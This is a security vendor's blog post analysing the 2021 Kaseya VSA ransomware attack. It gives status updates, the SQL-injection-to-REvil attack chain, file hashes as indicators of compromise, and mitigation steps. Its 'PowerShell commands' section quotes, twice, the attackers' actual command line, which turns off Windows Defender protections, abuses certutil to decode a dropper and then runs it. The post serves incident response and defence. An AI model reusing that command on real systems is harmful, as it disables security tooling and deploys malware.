The Dataprise Blog

Kaseya Ransomware Attack Analysis: Dataprise Defense Digest

Jul 06, 2021 BY DATAPRISE

Kaseya Ransomware Attack Analysis: Dataprise Defense Digest

UPDATE (JULY 6, 2021 @ 8:30 AM ET)

Kaseya continues to work on internal testing of the patches they have developed for VSA. They anticipate an update on the status of the patches as well as a preliminary estimate of when they expect to return to business as usual and advise customers when and how to bring their VSA servers back up safely.

Dataprise has run the Kaseya-provided detection scripts on our production VSA servers with no indications of any compromise discovered. Following the impending update from Kaseya, Dataprise will review the startup procedures and make the best determination for how to resume normal operations in a safe and controlled manner. Customer safety and security are our utmost priority. We are relying on Kaseya’s actions and updates in the short term, while internally strategizing longer term plans for reaction/response and contingency.

 

UPDATE (JULY 4, 2021)

Kaseya’s Compromise Detection Tool was provided to Dataprise at 10:36 PM EDT on July 3, 2021. The tool is comprised of two scripts, one for the VSA server and one for endpoints. Our VSA servers were temporarily powered on in an isolated, offline state to facilitate execution of both these scripts. We have also run the endpoint script on several internal machines that were registered with our VSAs. We shut our servers down again immediately after the scripts completed running. Each of these scans completed with no signs of compromise detected. Results were documented and confirmed back to Kaseya Support by 11:26 PM EDT.

 

EXECUTIVE SUMMARY

On July 2, 2021 Kaseya released an emergency communication via their website about a compromise of their VSA system being used to spread ransomware to client systems. Kaseya proactively shutdown their cloud environment and advised all customers using on-premise VSA servers to shut them down immediately. Kaseya has released information obtained through their internal investigation that indicates the attack vector was likely a SQL Injection against the VSA software that allowed the attacker to take control of the remote management tool, and deploy a REvil ransomware launcher to encrypt the victim systems of all clients.

It is being reported by multiple media outlets that at least six large Managed Service Providers (MSP) were compromised which gave attackers access to encrypt the files belonging to more than 200 companies.

Dataprise immediately shut down all on-premises Kaseya VSA servers and conducted a thorough investigation which determined that our VSA servers were not compromised. We will keep the VSA servers powered down until official patches are released to mitigate the attack vector.

 

DETAILED ANALYSIS

Huntress Labs’ investigation has revealed that the initial attack vector on Kaseya appears to utilize SQL Injection, allowing the attackers full control of the Kaseya VSA instance. In doing so, the attacker gains the ability to deploy a ransomware dropper out to agents checking into the instance. This is supported by evidence that VSA Administrator accounts are disabled moments before ransomware is deployed causing an automated VSA Security Notification indicating that the “KElevated######” (SQL User) account performed the action.

Once administrative access is disabled, the attackers deploy and execute their custom VSA procedure known as “Kaseya VSA Agent Hot-fix” which runs a PowerShell command to disable any Windows Defender telemetry, and then drops the malware’s digital certificate into the root certificate authority to appear as a legitimate signed application to Windows.

Once the certificate is installed, the command then drops the file “Agent.exe” into the path, “C:\kworking”. Once dropped, this file is then executed which drops the files “MsMpEng.exe” and “Mpsvc.dll” into “C:\Windows”.  The file “MsMpEng.exe” is a legitimate Windows Defender executable, but the other file “mpsvc.dll” is the ransomware encryptor payload that gets loaded by the file “MsMpEng.exe”.

 

POWERSHELL COMMANDS

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe”

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

 

DIGITAL CERTIFICATE

Digital Signature Information

Researchers have identified the ransomware family as REVil, which was released by the Sodinobiki group. This is supported by the ransom note left on encrypted systems.

Digital Signature Information

 

INDICATORS OF COMPROMISE

  • Hashes
    • Agent.exe
      • REvil Dropper
      • SHA256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
    • Malicious Dll Used by REvil
      • e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
    • C:\Windows\cert.exe
      • Dropper for the digital certificate used to bypass application signing restrictions
      • SHA256: 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
    • C:\Windows\msmpeng.exe
      • Legit Microsoft Defender Engine Used to Load mpsvc.dll
      • SHA256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
    • C:\Windows\mpsvc.dll
      • Malicious DLL Housing Ransomware Code
      • SHA256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
    • C:\kworking\agent.exe
      • SHA256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

 

 

MITIGATION

Dataprise has conducted a thorough investigation of our VSA servers and our networks and has not identified any Indicators of Compromise (IOC). We will leave the VSA servers off until Kaseya has provided patches that can be applied to remove the attack vector.

At this time, Kaseya is recommending that companies power off their VSA servers until the root cause has been identified. Dataprise VSA servers are currently powered off until further notice. Please check all backup solutions and make sure they are actively running and are current. Dataprise will be patching immediately once patches are released and will continue to stay alert for new updates.

Dataprise has also proactively blocked all known file hashes in our endpoint protection capabilities so the REvil ransomware files will not be able to execute and run. We are monitoring our tools and capabilities closely and will alert you to any indications of compromise.

 

SOURCES

•             https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

•             https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/

•             https://blackpointcyber.com/blog/kaseyavsa-zeroday/

 

CONTRIBUTING AUTHORS

•             Stephen Jones, Senior Director Cybersecurity

•             Susan Verdin, Cybersecurity Analyst

•             Max Williamson, Cybersecurity Analyst

•             Daniel Mervis, Cybersecurity Analyst

•             William Hartmann, Manager of Cloud Services

•             Mike Carroll, Manager of Network Operations Center

•             Ryan Miller, Director Infrastructure Management

Information Security
Want the latest IT insights? SUBSCRIBE